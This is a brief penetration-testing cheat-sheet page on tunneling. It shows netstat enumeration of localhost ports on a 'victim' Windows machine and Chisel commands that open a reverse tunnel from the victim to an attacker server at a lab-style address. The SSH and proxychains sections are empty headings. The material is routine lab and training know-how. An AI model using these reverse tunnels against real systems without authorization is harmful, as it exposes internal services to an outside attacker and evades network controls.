Tunneling

Enumeration

On victim machine , check which port is listening on localhost (the port you want to transfer)

> netstat -an | findstr TCP | findstr 127.0.0.1

TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING

Chisel

On Attacker machine

chisel server -p <Listening-port> --reverse
chisel server -p 8000 --reverse

On Victim machine

c.exe client <attacker-IP>:<Listening-port> R:<victim-transfer-port>:localhost:<attacker-recieving-port>
.\chisel.exe client 10.10.14.20:8000 R:8888:localhost:8888

SSH

Inside session

Outside the session

With proxychains

Last updated